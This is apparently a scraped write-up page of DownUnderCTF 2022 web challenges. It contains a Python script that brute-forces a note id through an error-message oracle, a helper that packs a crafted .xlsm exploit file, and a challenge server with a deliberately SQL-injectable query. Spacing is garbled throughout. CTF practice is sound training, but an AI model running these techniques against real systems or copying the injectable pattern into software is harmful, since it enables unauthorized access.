Well the world has been looking for this treasure forthelast25 years. Maybe you will have a better chance at finding it? Author: Crem#2193 https://web-treasure-hunt-e9a4730c2093.2022.ductf.dev
What's a beginner-friendly CTF without a totally not generic Bootstrap note taking web chall? Author: joseph#8210 https://web-noteworthy-873b7c844f49.2022.ductf.dev
res = requests.get(url+payload,cookies=cookie) # You are not the owner of this note! for j inrange(0,50): for i in'abdcefghijklmnopqrstuvwxyz012345678ABCDEFGHIJKLMNOPQRSTUVWXYZ_': res = requests.get(url+payload+i,cookies=cookie) if"You are not the owner of this note!"in res.text: payload += i print(payload) break
Uni of Straya
1 2 3 4 5 6 7
The University of Straya are about to release their new Assignment Submission System (ASS) intwo days, but have some concerns about the security oftheplatform. These concerns stemmed bythe lead web developer admitting to inhaling burnt Hungry Jacks toys while developing the Flask REST API.
To assure the security oftheplatform follows best standards, you have the following goals to achieve:
1.Bypass authorization and view the admin console located at /admin. 2.Bypass access controls that prevent students from viewing other assignment submissions orthe source code forthe API. To demonstrate you have achieved this goal, there is afile called flag.txt inthe API source code folder. 3.Exploit any critical vulnerabilities, such as RCE. If you can achieve RCE, run thecommandgetfinalflagtogettheflag.
Testing out the openpyxl library for python but there's some functionality I wish it had. Author: JZT https://web-dyslexxec-773a3cb4c483.2022.ductf.dev dyslexxec.tar.gz
# 压缩文件 import os import zipfile defzip_file(src_dir): zip_name = src_dir +'.zip' z = zipfile.ZipFile(zip_name,'w',zipfile.ZIP_DEFLATED) for dirpath, dirnames, filenames in os.walk(src_dir): fpath = dirpath.replace(src_dir,'') fpath = fpath and fpath + os.sep or'' for filename in filenames: z.write(os.path.join(dirpath, filename),fpath+filename) print ('==压缩成功==') z.close()
if __name__ == '__main__': zip_file('exp') os.remove('exp.xlsm') os.rename('exp.zip','./exp.xlsm')
no-symlink
1 2 3
I heard symlinks are really dangerous so I delete them all and keep my secrets safe. Author: hashkitten https://web-no-symlink-821c2e0dbc5e.2022.ductf.dev
from flask import Flask, request import textwrap import sqlite3 import os import hashlib
assertlen(os.environ['FLAG']) > 32
app = Flask(__name__)
@app.route('/', methods=['POST']) defroot_post(): post = request.form # Sent params? if'username'notin post or'password'notin post: return'Username or password missing from request'
# We are recreating this every request con = sqlite3.connect(':memory:') cur = con.cursor() cur.execute('CREATE TABLE users (username TEXT, password TEXT)') cur.execute( 'INSERT INTO users VALUES ("admin", ?)', [hashlib.md5(os.environ['FLAG'].encode()).hexdigest()] ) output = cur.execute( 'SELECT * FROM users WHERE username = {post[username]!r} AND password = {post[password]!r}' .format(post=post) ).fetchone() # Credentials OK? if output isNone: return'Wrong credentials' # Nothing suspicious? username, password = output if username != post["username"] or password != post["password"]: return'Wrong credentials (are we being hacked?)' # Everything is all good returnf'Welcome back {post["username"]}! The flag is in FLAG.'.format(post=post)